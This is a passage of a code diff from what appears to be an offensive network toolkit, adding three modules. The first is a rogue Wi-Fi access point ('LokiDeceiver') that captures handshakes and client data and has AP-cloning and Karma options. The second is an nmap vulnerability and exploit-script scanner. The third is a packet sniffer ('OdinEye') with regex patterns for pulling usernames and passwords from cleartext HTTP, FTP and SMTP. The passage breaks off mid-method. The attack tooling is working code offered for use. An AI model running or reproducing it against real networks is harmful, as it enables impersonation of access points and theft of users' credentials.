DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/wifi"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "loki_deceiver_settings.json")

class LokiDeceiver:
    def __init__(self, interface, ssid, channel=6, password=None, output_dir=DEFAULT_OUTPUT_DIR):
        self.interface = interface
        self.ssid = ssid
        self.channel = channel
        self.password = password
        self.output_dir = output_dir

        self.original_mac = None
        self.captured_handshakes = []
        self.captured_credentials = []
        self.active = False
        self.lock = threading.Lock()

        # Process handles, populated by start_ap(); cleanup() relies on them
        self.hostapd_process = None
        self.dnsmasq_process = None
        self.tcpdump_process = None

    def setup_interface(self):
        """Configure wireless interface for AP mode."""
        try:
            # Kill potentially interfering processes
            subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'],
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)

            # Stop NetworkManager
            subprocess.run(['sudo', 'systemctl', 'stop', 'NetworkManager'],
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)

            # Save original MAC
            self.original_mac = self.get_interface_mac()

            # Enable monitor mode
            subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            subprocess.run(['sudo', 'iw', self.interface, 'set', 'monitor', 'none'],
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)

            logging.info(f"Interface {self.interface} configured in monitor mode")
            return True

        except Exception as e:
            logging.error(f"Failed to setup interface: {e}")
            return False

    def get_interface_mac(self):
        """Get the MAC address of the wireless interface."""
        try:
            result = subprocess.run(['ip', 'link', 'show', self.interface],
                                    stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
            if result.returncode == 0:
                mac = re.search(r'link/ether ([0-9a-f:]{17})', result.stdout)
                if mac:
                    return mac.group(1)
        except Exception as e:
            logging.error(f"Failed to get interface MAC: {e}")
        return None

    def create_ap_config(self):
        """Create configuration for hostapd."""
        try:
            config = [
                'interface=' + self.interface,
                'driver=nl80211',
                'ssid=' + self.ssid,
                'hw_mode=g',
                'channel=' + str(self.channel),
                'macaddr_acl=0',
                'ignore_broadcast_ssid=0'
            ]

            if self.password:
                config.extend([
                    'auth_algs=1',
                    'wpa=2',
                    'wpa_passphrase=' + self.password,
                    'wpa_key_mgmt=WPA-PSK',
                    'wpa_pairwise=CCMP',
                    'rsn_pairwise=CCMP'
                ])

            config_path = '/tmp/hostapd.conf'
            with open(config_path, 'w') as f:
                f.write('\n'.join(config))

            return config_path

        except Exception as e:
            logging.error(f"Failed to create AP config: {e}")
            return None
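    # For reference, the open-AP config generated above looks like this
    # (SSID value is whatever --ssid was given):
    #   interface=wlan0
    #   driver=nl80211
    #   ssid=FreeWifi
    #   hw_mode=g
    #   channel=6
    #   macaddr_acl=0
    #   ignore_broadcast_ssid=0
    # with the auth_algs/wpa=2/... block appended when a password is set.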

    def setup_dhcp(self):
        """Configure DHCP server using dnsmasq."""
        try:
            config = [
                'interface=' + self.interface,
                'dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h',
                'dhcp-option=3,192.168.1.1',
                'dhcp-option=6,192.168.1.1',
                'server=8.8.8.8',
                'log-queries',
                'log-dhcp'
            ]

            config_path = '/tmp/dnsmasq.conf'
            with open(config_path, 'w') as f:
                f.write('\n'.join(config))

            # Configure interface IP
            subprocess.run(['sudo', 'ifconfig', self.interface, '192.168.1.1', 'netmask', '255.255.255.0'],
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)

            return config_path

        except Exception as e:
            logging.error(f"Failed to setup DHCP: {e}")
            return None

    def start_ap(self):
        """Start the fake access point."""
        try:
            if not self.setup_interface():
                return False

            hostapd_config = self.create_ap_config()
            dhcp_config = self.setup_dhcp()

            if not hostapd_config or not dhcp_config:
                return False

            # Start hostapd
            self.hostapd_process = subprocess.Popen(
                ['sudo', 'hostapd', hostapd_config],
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE
            )

            # Start dnsmasq
            self.dnsmasq_process = subprocess.Popen(
                ['sudo', 'dnsmasq', '-C', dhcp_config],
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE
            )

            self.active = True
            logging.info(f"Access point {self.ssid} started on channel {self.channel}")

            # Start packet capture
            self.start_capture()

            return True

        except Exception as e:
            logging.error(f"Failed to start AP: {e}")
            return False

    def start_capture(self):
        """Start capturing wireless traffic."""
        try:
            # Start tcpdump for capturing handshakes
            handshake_path = os.path.join(self.output_dir, 'handshakes')
            os.makedirs(handshake_path, exist_ok=True)

            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
            pcap_file = os.path.join(handshake_path, f"capture_{timestamp}.pcap")

            self.tcpdump_process = subprocess.Popen(
                ['sudo', 'tcpdump', '-i', self.interface, '-w', pcap_file],
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE
            )

            # Start sniffing in a separate thread
            self.sniffer_thread = threading.Thread(target=self.packet_sniffer)
            self.sniffer_thread.start()

        except Exception as e:
            logging.error(f"Failed to start capture: {e}")

    def packet_sniffer(self):
        """Sniff and process packets."""
        try:
            scapy.sniff(iface=self.interface, prn=self.process_packet, store=0,
                        stop_filter=lambda p: not self.active)
        except Exception as e:
            logging.error(f"Sniffer error: {e}")

    def process_packet(self, packet):
        """Process captured packets."""
        try:
            if packet.haslayer(Dot11):
                # Process authentication attempts
                if packet.type == 0 and packet.subtype == 11:  # Authentication
                    self.process_auth(packet)

                # Process association requests
                elif packet.type == 0 and packet.subtype == 0:  # Association request
                    self.process_assoc(packet)

                # Process EAPOL packets for handshakes
                elif packet.haslayer(EAPOL):
                    self.process_handshake(packet)

        except Exception as e:
            logging.error(f"Error processing packet: {e}")

    def process_auth(self, packet):
        """Process authentication packets."""
        try:
            if packet.addr2:  # Source MAC
                with self.lock:
                    self.captured_credentials.append({
                        'type': 'auth',
                        'mac': packet.addr2,
                        'timestamp': datetime.now().isoformat()
                    })
        except Exception as e:
            logging.error(f"Error processing auth packet: {e}")

    def process_assoc(self, packet):
        """Process association packets."""
        try:
            if packet.addr2:  # Source MAC
                with self.lock:
                    self.captured_credentials.append({
                        'type': 'assoc',
                        'mac': packet.addr2,
                        'timestamp': datetime.now().isoformat()
                    })
        except Exception as e:
            logging.error(f"Error processing assoc packet: {e}")

    def process_handshake(self, packet):
        """Process EAPOL packets for handshakes."""
        try:
            if packet.addr2:  # Source MAC
                with self.lock:
                    self.captured_handshakes.append({
                        'mac': packet.addr2,
                        'timestamp': datetime.now().isoformat()
                    })
        except Exception as e:
            logging.error(f"Error processing handshake packet: {e}")

    def save_results(self):
        """Save captured data to JSON files."""
        try:
            os.makedirs(self.output_dir, exist_ok=True)
            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")

            results = {
                'ap_info': {
                    'ssid': self.ssid,
                    'channel': self.channel,
                    'interface': self.interface
                },
                'credentials': self.captured_credentials,
                'handshakes': self.captured_handshakes
            }

            output_file = os.path.join(self.output_dir, f"results_{timestamp}.json")
            with open(output_file, 'w') as f:
                json.dump(results, f, indent=4)

            logging.info(f"Results saved to {output_file}")

        except Exception as e:
            logging.error(f"Failed to save results: {e}")

    def cleanup(self):
        """Clean up resources and restore interface."""
        try:
            self.active = False

            # Stop processes
            for process in [self.hostapd_process, self.dnsmasq_process, self.tcpdump_process]:
                if process:
                    process.terminate()
                    process.wait()

            # Restore interface
            if self.original_mac:
                subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                subprocess.run(['sudo', 'iw', self.interface, 'set', 'type', 'managed'],
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE)

            # Restart NetworkManager
            subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'],
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)

            logging.info("Cleanup completed")

        except Exception as e:
            logging.error(f"Error during cleanup: {e}")

def save_settings(interface, ssid, channel, password, output_dir):
    """Save settings to JSON file."""
    try:
        os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
        settings = {
            "interface": interface,
            "ssid": ssid,
            "channel": channel,
            "password": password,
            "output_dir": output_dir
        }
        with open(SETTINGS_FILE, 'w') as f:
            json.dump(settings, f)
        logging.info(f"Settings saved to {SETTINGS_FILE}")
    except Exception as e:
        logging.error(f"Failed to save settings: {e}")

def load_settings():
    """Load settings from JSON file."""
    if os.path.exists(SETTINGS_FILE):
        try:
            with open(SETTINGS_FILE, 'r') as f:
                return json.load(f)
        except Exception as e:
            logging.error(f"Failed to load settings: {e}")
    return {}
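
# main() below calls scan_for_ap(), which is not defined anywhere in this
# diff. A minimal sketch of what it could look like, using the Dot11Beacon
# and Dot11Elt layers already imported above (an assumption, not the author's
# implementation; requires monitor mode and root):
def scan_for_ap(interface, target_ssid, timeout=15):
    """Sniff beacons and return {'ssid', 'channel'} for the first matching AP."""
    found = {}

    def _handle(pkt):
        if pkt.haslayer(Dot11Beacon):
            ssid_elt = pkt.getlayer(Dot11Elt, ID=0)
            ssid = ssid_elt.info.decode(errors="ignore") if ssid_elt else ""
            if ssid == target_ssid and not found:
                # network_stats() parses channel/crypto info from the beacon
                stats = pkt[Dot11Beacon].network_stats()
                found.update({'ssid': ssid, 'channel': stats.get('channel', 6)})

    scapy.sniff(iface=interface, prn=_handle, timeout=timeout,
                stop_filter=lambda p: bool(found))
    return found or None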

def main():
    parser = argparse.ArgumentParser(description="WiFi deception tool")
    parser.add_argument("-i", "--interface", default="wlan0", help="Wireless interface")
    parser.add_argument("-s", "--ssid", help="SSID for fake AP")
    parser.add_argument("-c", "--channel", type=int, default=6, help="WiFi channel")
    parser.add_argument("-p", "--password", help="WPA2 password")
    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")

    # Honeypot options
    parser.add_argument("--captive-portal", action="store_true", help="Enable captive portal")
    parser.add_argument("--clone-ap", help="SSID to clone and impersonate")
    parser.add_argument("--karma", action="store_true", help="Enable Karma attack mode")

    # Advanced options
    parser.add_argument("--beacon-interval", type=int, default=100, help="Beacon interval in ms")
    parser.add_argument("--max-clients", type=int, default=10, help="Maximum number of clients")
    parser.add_argument("--timeout", type=int, help="Runtime duration in seconds")

    args = parser.parse_args()

    settings = load_settings()
    interface = args.interface or settings.get("interface")
    ssid = args.ssid or settings.get("ssid")
    channel = args.channel or settings.get("channel")
    password = args.password or settings.get("password")
    output_dir = args.output or settings.get("output_dir")

    # Load advanced settings (parsed here, but not yet wired into LokiDeceiver)
    captive_portal = args.captive_portal or settings.get("captive_portal", False)
    clone_ap = args.clone_ap or settings.get("clone_ap")
    karma = args.karma or settings.get("karma", False)
    beacon_interval = args.beacon_interval or settings.get("beacon_interval", 100)
    max_clients = args.max_clients or settings.get("max_clients", 10)
    timeout = args.timeout or settings.get("timeout")

    if not interface:
        logging.error("Interface is required. Use -i or save it in settings")
        return

    # Clone AP if requested
    if clone_ap:
        logging.info(f"Attempting to clone AP: {clone_ap}")
        clone_info = scan_for_ap(interface, clone_ap)
        if clone_info:
            ssid = clone_info['ssid']
            channel = clone_info['channel']
            logging.info(f"Successfully cloned AP settings: {ssid} on channel {channel}")
        else:
            logging.error(f"Failed to find AP to clone: {clone_ap}")
            return

    # Persist the core settings (the advanced honeypot options above are not
    # part of save_settings()'s signature and are therefore not persisted)
    save_settings(
        interface=interface,
        ssid=ssid,
        channel=channel,
        password=password,
        output_dir=output_dir
    )

    # Create and configure the deceiver (only the arguments LokiDeceiver accepts;
    # captive_portal/karma/beacon_interval/max_clients have no hook in the class yet)
    deceiver = LokiDeceiver(
        interface=interface,
        ssid=ssid,
        channel=channel,
        password=password,
        output_dir=output_dir
    )

    try:
        # Start the deception
        if deceiver.start_ap():
            logging.info(f"Access point {ssid} started on channel {channel}")

            if timeout:
                logging.info(f"Running for {timeout} seconds")
                time.sleep(timeout)
            else:
                logging.info("Press Ctrl+C to stop")
                while True:
                    time.sleep(1)

    except KeyboardInterrupt:
        logging.info("Stopping Loki Deceiver...")
    except Exception as e:
        logging.error(f"Unexpected error: {e}")
    finally:
        # Persist captures, then tear the AP down and restore the interface
        deceiver.save_results()
        deceiver.cleanup()

if __name__ == "__main__":
    # Set process niceness to high priority
    try:
        os.nice(-10)
    except OSError:
        logging.warning("Failed to set process priority. Running with default priority.")

    # Start main function
    main()
423
resources/default_config/actions/nmap_vuln_scanner.py
Normal file
@@ -0,0 +1,423 @@
# actions/NmapVulnScanner.py
"""
Vulnerability Scanner Action
Ultra-fast CPE scan (+ CVE via vulners when available),
with an optional "heavy" fallback mode.
"""

import re
import nmap
import json
import logging
from typing import Dict, List, Set, Any, Optional
from datetime import datetime, timedelta

from shared import SharedData
from logger import Logger

logger = Logger(name="NmapVulnScanner.py", level=logging.DEBUG)

# Scheduler parameters (unchanged)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "NmapVulnScanner"
b_port = None
b_parent = None
b_action = "normal"
b_service = []
b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11
b_cooldown = 0
b_enabled = 0
b_rate_limit = None


class NmapVulnScanner:
    """Vulnerability scanner built on nmap (fast CPE/CVE mode)."""

    def __init__(self, shared_data: SharedData):
        self.shared_data = shared_data
        self.nm = nmap.PortScanner()
        logger.info("NmapVulnScanner initialized")

    # ---------------------------- Public API ---------------------------- #

    def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
        try:
            logger.info(f"Starting vulnerability scan for {ip}")
            self.shared_data.bjorn_orch_status = "NmapVulnScanner"

            # 1) metadata from the queue
            meta = {}
            try:
                meta = json.loads(row.get('metadata') or '{}')
            except Exception:
                pass

            # 2) resolve ports (order: row -> metadata -> DB by MAC -> DB by IP)
            ports_str = (
                row.get("Ports") or row.get("ports") or
                meta.get("ports_snapshot") or ""
            )

            mac = (
                row.get("MAC Address") or row.get("mac_address") or
                ""
            )

            if not ports_str and mac:
                r = self.shared_data.db.query(
                    "SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
                )
                if r and r[0].get('ports'):
                    ports_str = r[0]['ports']

            if not ports_str and ip:
                r = self.shared_data.db.query(
                    "SELECT mac_address, ports FROM hosts WHERE ips LIKE ? LIMIT 1",
                    (f"%{ip}%",)
                )
                if r:
                    mac = mac or r[0].get('mac_address') or mac
                    ports_str = r[0].get('ports') or ports_str

            if not ports_str:
                logger.warning(f"No ports to scan for {ip}")
                return 'failed'

            ports = [p.strip() for p in ports_str.split(';') if p.strip()]
            mac = mac or row.get("MAC Address") or ""

            # Skip ports already scanned (unless the TTL has expired)
            ports = self._filter_ports_already_scanned(mac, ports)
            if not ports:
                logger.info(f"No new/changed ports to scan for {ip}")
                # still touch the statuses to deactivate any stale entries
                self.save_vulnerabilities(mac, ip, [])
                return 'success'

            # Scan (fast mode by default)
            findings = self.scan_vulnerabilities(ip, ports)

            # Persist (split CVE/CPE)
            self.save_vulnerabilities(mac, ip, findings)
            logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
            return 'success'

        except Exception as e:
            logger.error(f"NmapVulnScanner failed for {ip}: {e}")
            return 'failed'

    def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
        """
        Return the list of ports to scan, excluding those scanned recently.
        - Config:
            vuln_rescan_on_change_only (bool, default True)
            vuln_rescan_ttl_seconds (int, 0 = disabled)
        """
        if not ports:
            return []

        if not bool(self.shared_data.config.get('vuln_rescan_on_change_only', True)):
            return ports  # no filtering

        # Ports already covered by detected_software (is_active=1)
        rows = self.shared_data.db.query("""
            SELECT port, last_seen
            FROM detected_software
            WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
        """, (mac,))
        seen = {}
        for r in rows:
            try:
                p = str(r['port'])
                ls = r.get('last_seen')
                seen[p] = ls
            except Exception:
                pass

        ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
        if ttl > 0:
            cutoff = datetime.utcnow() - timedelta(seconds=ttl)
            def fresh(port: str) -> bool:
                ls = seen.get(port)
                if not ls:
                    return False
                try:
                    dt = datetime.fromisoformat(ls.replace('Z', ''))
                    return dt >= cutoff
                except Exception:
                    return True  # when in doubt, treat it as fresh
            return [p for p in ports if (p not in seen) or (not fresh(p))]
        else:
            # Without a TTL: skip anything already scanned and still active
            return [p for p in ports if p not in seen]
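    # Example config (these keys are read above; the values are illustrative):
    #   {"vuln_rescan_on_change_only": true, "vuln_rescan_ttl_seconds": 86400}
    # With a 24 h TTL, a port whose detected_software row was seen less than a
    # day ago is skipped; with ttl=0, any active row skips the port outright.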

    # ---------------------------- Scanning ------------------------------ #

    def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
        """
        Fast mode (default):
          - nmap -sV --version-light on a reduced set of ports
          - CPEs extracted directly from service detection
          - (optional) --script=vulners to extract CVEs (if the script is installed)
        Fallback (when vuln_fast=False): the old mode with 'vuln' scripts, etc.
        """
        fast = bool(self.shared_data.config.get('vuln_fast', True))
        use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
        max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))

        p_list = [str(p).split('/')[0] for p in ports if str(p).strip()]
        port_list = ','.join(p_list[:max_ports]) if p_list else ''

        if not port_list:
            logger.warning("No valid ports for scan")
            return []

        if fast:
            return self._scan_fast_cpe_cve(ip, port_list, use_vulners)
        else:
            return self._scan_heavy(ip, port_list)

    def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
        """Fast scan to collect CPEs and (optionally) CVEs via vulners."""
        vulns: List[Dict] = []

        args = "-sV --version-light -T4 --max-retries 1 --host-timeout 30s --script-timeout 10s"
        if use_vulners:
            args += " --script vulners --script-args mincvss=0.0"

        logger.info(f"[FAST] nmap {ip} -p {port_list} ({args})")
        try:
            self.nm.scan(hosts=ip, ports=port_list, arguments=args)
        except Exception as e:
            logger.error(f"Fast scan failed to start: {e}")
            return vulns

        if ip not in self.nm.all_hosts():
            return vulns

        host = self.nm[ip]

        for proto in host.all_protocols():
            for port in host[proto].keys():
                port_info = host[proto][port]
                service = port_info.get('name', '') or ''

                # 1) CPEs from -sV
                cpe_values = self._extract_cpe_values(port_info)
                for cpe in cpe_values:
                    vulns.append({
                        'port': port,
                        'service': service,
                        'vuln_id': f"CPE:{cpe}",
                        'script': 'service-detect',
                        'details': f"CPE detected: {cpe}"[:500]
                    })

                # 2) CVEs via the 'vulners' script (if enabled)
                try:
                    script_out = (port_info.get('script') or {}).get('vulners')
                    if script_out:
                        for cve in self.extract_cves(script_out):
                            vulns.append({
                                'port': port,
                                'service': service,
                                'vuln_id': cve,
                                'script': 'vulners',
                                'details': str(script_out)[:500]
                            })
                except Exception:
                    pass

        return vulns
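    # The fast path above is roughly equivalent to this CLI invocation
    # (illustrative, with vulners enabled and two ports queued):
    #   nmap -sV --version-light -T4 --max-retries 1 --host-timeout 30s \
    #        --script-timeout 10s --script vulners --script-args mincvss=0.0 \
    #        -p 22,80 <ip>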

    def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
        """Old (slower) strategy using the vuln script category, etc."""
        vulnerabilities: List[Dict] = []
        vuln_scripts = [
            'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
            'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
        ]
        script_arg = ','.join(vuln_scripts)

        args = f"-sV --script={script_arg} -T3 --script-timeout 20s"
        logger.info(f"[HEAVY] nmap {ip} -p {port_list} ({args})")
        try:
            self.nm.scan(hosts=ip, ports=port_list, arguments=args)
        except Exception as e:
            logger.error(f"Heavy scan failed to start: {e}")
            return vulnerabilities

        if ip in self.nm.all_hosts():
            host = self.nm[ip]
            discovered_ports: Set[str] = set()

            for proto in host.all_protocols():
                for port in host[proto].keys():
                    discovered_ports.add(str(port))
                    port_info = host[proto][port]
                    service = port_info.get('name', '') or ''

                    if 'script' in port_info:
                        for script_name, output in (port_info.get('script') or {}).items():
                            for cve in self.extract_cves(str(output)):
                                vulnerabilities.append({
                                    'port': port,
                                    'service': service,
                                    'vuln_id': cve,
                                    'script': script_name,
                                    'details': str(output)[:500]
                                })
                            if 'vuln' in (script_name or '') and not self.extract_cves(str(output)):
                                # 'FINDING' entries without a CVE are no longer stored
                                pass

            if bool(self.shared_data.config.get('scan_cpe', False)):
                ports_for_cpe = list(discovered_ports) if discovered_ports else port_list.split(',')
                cpes = self.scan_cpe(ip, ports_for_cpe[:10])
                vulnerabilities.extend(cpes)

        return vulnerabilities

    # ---------------------------- Helpers -------------------------------- #

    def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
        """Normalize every CPE format python-nmap may return."""
        cpe = port_info.get('cpe')
        if not cpe:
            return []
        if isinstance(cpe, str):
            parts = [x.strip() for x in cpe.splitlines() if x.strip()]
            return parts or [cpe]
        if isinstance(cpe, (list, tuple, set)):
            return [str(x).strip() for x in cpe if str(x).strip()]
        try:
            return [str(cpe).strip()] if str(cpe).strip() else []
        except Exception:
            return []

    def extract_cves(self, text: str) -> List[str]:
        """Extract CVE identifiers from a text blob."""
        if not text:
            return []
        cve_pattern = r'CVE-\d{4}-\d{4,7}'
        return re.findall(cve_pattern, str(text), re.IGNORECASE)
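    # Quick sanity check of the regex above (illustrative):
    #   extract_cves("Apache 2.4.49 - cve-2021-41773, CVE-2021-42013")
    #   -> ['cve-2021-41773', 'CVE-2021-42013']   (case-insensitive match)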

    def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
        """(Heavy fallback) Detailed CPE scan when requested."""
        cpe_vulns: List[Dict] = []
        try:
            port_list = ','.join([str(p) for p in ports if str(p).strip()])
            if not port_list:
                return cpe_vulns

            args = "-sV --version-all -T3 --max-retries 2 --host-timeout 45s"
            logger.info(f"[CPE] nmap {ip} -p {port_list} ({args})")
            self.nm.scan(hosts=ip, ports=port_list, arguments=args)

            if ip in self.nm.all_hosts():
                host = self.nm[ip]
                for proto in host.all_protocols():
                    for port in host[proto].keys():
                        port_info = host[proto][port]
                        service = port_info.get('name', '') or ''
                        for cpe in self._extract_cpe_values(port_info):
                            cpe_vulns.append({
                                'port': port,
                                'service': service,
                                'vuln_id': f"CPE:{cpe}",
                                'script': 'version-scan',
                                'details': f"CPE detected: {cpe}"[:500]
                            })
        except Exception as e:
            logger.error(f"CPE scan error: {e}")
        return cpe_vulns

    # ---------------------------- Persistence ---------------------------- #

    def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
        """Split CPEs and CVEs, update statuses, and record new entries with full details."""

        # Fetch the hostname from the DB
        hostname = None
        try:
            host_row = self.shared_data.db.query_one(
                "SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1",
                (mac,)
            )
            if host_row and host_row.get('hostnames'):
                hostname = host_row['hostnames'].split(';')[0]
        except Exception as e:
            logger.debug(f"Could not fetch hostname: {e}")

        # Group by port with full details
        findings_by_port = {}
        for f in findings:
            port = int(f.get('port', 0) or 0)

            if port not in findings_by_port:
                findings_by_port[port] = {
                    'cves': set(),
                    'cpes': set(),
                    'findings': []
                }

            findings_by_port[port]['findings'].append(f)

            vid = str(f.get('vuln_id', ''))
            if vid.upper().startswith('CVE-'):
                findings_by_port[port]['cves'].add(vid)
            elif vid.startswith('CPE:'):
                # our own "CPE:" wrapper prefix -> strip it
                findings_by_port[port]['cpes'].add(vid.split(':', 1)[1])
            elif vid.lower().startswith('cpe:'):
                # raw CPE string -> keep as-is (the case-insensitive .upper()
                # check used previously swallowed this branch and mangled it)
                findings_by_port[port]['cpes'].add(vid)

        # 1) Handle CVEs per port
        for port, data in findings_by_port.items():
            if data['cves']:
                for cve in data['cves']:
                    try:
                        # Check whether it already exists
                        existing = self.shared_data.db.query_one(
                            "SELECT id FROM vulnerabilities WHERE mac_address=? AND vuln_id=? AND port=? LIMIT 1",
                            (mac, cve, port)
                        )

                        if existing:
                            # Update with IP and hostname
                            self.shared_data.db.execute("""
                                UPDATE vulnerabilities
                                SET ip=?, hostname=?, last_seen=CURRENT_TIMESTAMP, is_active=1
                                WHERE mac_address=? AND vuln_id=? AND port=?
                            """, (ip, hostname, mac, cve, port))
                        else:
                            # New entry with full details
                            self.shared_data.db.execute("""
                                INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active)
                                VALUES(?,?,?,?,?,1)
                            """, (mac, ip, hostname, port, cve))

                        logger.debug(f"Saved CVE {cve} for {ip}:{port}")

                    except Exception as e:
                        logger.error(f"Failed to save CVE {cve}: {e}")

        # 2) Handle CPEs
        for port, data in findings_by_port.items():
            for cpe in data['cpes']:
                try:
                    self.shared_data.db.add_detected_software(
                        mac_address=mac,
                        cpe=cpe,
                        ip=ip,
                        hostname=hostname,
                        port=port
                    )
                except Exception as e:
                    logger.error(f"Failed to save CPE {cpe}: {e}")

        logger.info(f"Saved vulnerabilities for {ip} ({mac}): {len(findings_by_port)} ports processed")
417
resources/default_config/actions/odin_eye.py
Normal file
@@ -0,0 +1,417 @@
# --- ADDITIONS AT THE TOP OF THE FILE ---------------------------------------
import os
try:
    import psutil
except Exception:
    psutil = None


def _list_net_ifaces() -> list[str]:
    names = set()
    # 1) psutil when available
    if psutil:
        try:
            names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
        except Exception:
            pass
    # 2) kernel fallback
    try:
        for n in os.listdir("/sys/class/net"):
            if n and n != "lo":
                names.add(n)
    except Exception:
        pass
    out = ["auto"] + sorted(names)
    # safety: no duplicates
    seen, unique = set(), []
    for x in out:
        if x not in seen:
            unique.append(x)
            seen.add(x)
    return unique


# Hook called by the backend before UI display / DB sync
def compute_dynamic_b_args(base: dict) -> dict:
    """
    Compute dynamic arguments at runtime.
    Called by the web interface to populate dropdowns, etc.
    """
    d = dict(base or {})

    # Dynamic interface list: delegate to the helper above, which already
    # handles the psutil and /sys/class/net fallbacks (the previous inline
    # re-implementation duplicated it and re-imported psutil unguarded)
    if "interface" in d:
        d["interface"]["choices"] = _list_net_ifaces()

    return d
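
# Illustrative call (where exactly the backend performs the merge is an
# assumption):
#   b_args = compute_dynamic_b_args(b_args)
#   b_args["interface"]["choices"]   # e.g. ["auto", "eth0", "wlan0"]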

# --- EXTRA UI METADATA -------------------------------------------------------
# Example arguments (frontend display; also persisted to DB via sync_actions)
b_examples = [
    {"interface": "auto", "filter": "http or ftp", "timeout": 120, "max_packets": 5000, "save_credentials": True},
    {"interface": "wlan0", "filter": "(http or smtp) and not broadcast", "timeout": 300, "max_packets": 10000},
]

# Markdown link (can be a local path served by your frontend, or http(s))
# Example: a markdown README stored in your repo
b_docs_url = "docs/actions/OdinEye.md"


# --- Action metadata (consumed by shared.generate_actions_json) -------------
b_class = "OdinEye"
b_module = "odin_eye"  # file name without .py
b_enabled = 0
b_action = "normal"
b_category = "recon"
b_name = "Odin Eye"
b_description = (
    "Network traffic analyzer for capturing and analyzing data patterns and credentials.\n"
    "Requires: tshark (sudo apt install tshark) + pyshark (pip install pyshark)."
)
b_author = "Fabien / Cyberviking"
b_version = "1.0.0"
b_icon = "OdinEye.png"

# Argument schema for the dynamic UI (key == flag name without '--')
b_args = {
    "interface": {
        "type": "select", "label": "Network Interface",
        "choices": [],  # <- leave empty: filled dynamically by compute_dynamic_b_args(...)
        "default": "auto",
        "help": "Interface to listen on. 'auto' tries to detect the default interface."},
    "filter": {"type": "text", "label": "BPF Filter", "default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"},
    "output": {"type": "text", "label": "Output dir", "default": "/home/bjorn/Bjorn/data/output/packets"},
    "timeout": {"type": "number", "label": "Timeout (s)", "min": 10, "max": 36000, "step": 1, "default": 300},
    "max_packets": {"type": "number", "label": "Max packets", "min": 100, "max": 2000000, "step": 100, "default": 10000},
}

# ----------------- Analysis code (existing implementation) ------------------
import json
import pyshark
import argparse
import logging
import re
import threading
import signal
from datetime import datetime
from collections import defaultdict

logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/packets"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "odin_eye_settings.json")
DEFAULT_FILTER = "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"

CREDENTIAL_PATTERNS = {
    'http': {
        'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
        'password': [r'password=([^&]+)', r'pass=([^&]+)']
    },
    'ftp': {
        'username': [r'USER\s+(.+)', r'USERNAME\s+(.+)'],
        'password': [r'PASS\s+(.+)']
    },
    'smtp': {
        'auth': [r'AUTH\s+PLAIN\s+(.+)', r'AUTH\s+LOGIN\s+(.+)']
    }
}
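# Quick illustration of the HTTP patterns above:
#   re.findall(r'username=([^&]+)', "login.php?username=bob&password=hunter2")
#   -> ['bob']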
|
||||
|
||||
class OdinEye:
    def __init__(self, interface, capture_filter=DEFAULT_FILTER, output_dir=DEFAULT_OUTPUT_DIR,
                 timeout=300, max_packets=10000):
        self.interface = interface
        self.capture_filter = capture_filter
        self.output_dir = output_dir
        self.timeout = timeout
        self.max_packets = max_packets
        self.capture = None
        self.stop_capture = threading.Event()

        self.statistics = defaultdict(int)
        self.credentials = []
        self.interesting_patterns = []

        self.lock = threading.Lock()

    def process_packet(self, packet):
        try:
            with self.lock:
